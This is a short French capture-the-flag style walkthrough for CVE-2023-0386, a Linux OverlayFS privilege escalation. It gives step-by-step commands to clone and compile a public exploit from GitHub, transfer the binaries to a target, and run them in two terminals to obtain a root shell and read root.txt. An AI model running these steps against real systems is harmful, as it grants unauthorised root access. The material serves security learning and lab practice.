Explotation du Kernel (OverlayFS) Linux Privilege Escalation

Exploitation de CVE-2023-0386 – OverlayFS Privilege Escalation

OverlayFS permet de superposer des systèmes de fichiers. Dans certaines versions du noyau Linux, une mauvaise gestion des capacités permet à un utilisateur non privilégié d’exécuter du code avec les droits root.

GitHub - puckiestyle/CVE-2023-0386GitHub

Étapes d’exploitation

Cloner l’exploit depuis notre machine locale :

git clone https://github.com/puckiestyle/CVE-2023-0386
cd CVE-2023-0386
make all

Transférer les fichiers compilés vers la machine cible (scp, python -m http.server, etc.).

Sur la machine cible, exécuter dans deux terminaux :

Terminal A :

./fuse ./ovlcap/lower ./gc

Terminal B :

./exp

Si tout se passe bien, nous obtenons un shell root

Flag root.txt :)

Mis à jour il y a 6 mois

Ce contenu vous a-t-il été utile ?